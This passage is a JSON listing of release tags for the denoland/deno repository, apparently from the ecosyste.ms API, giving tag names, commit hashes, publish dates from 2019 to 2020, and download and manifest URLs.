dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://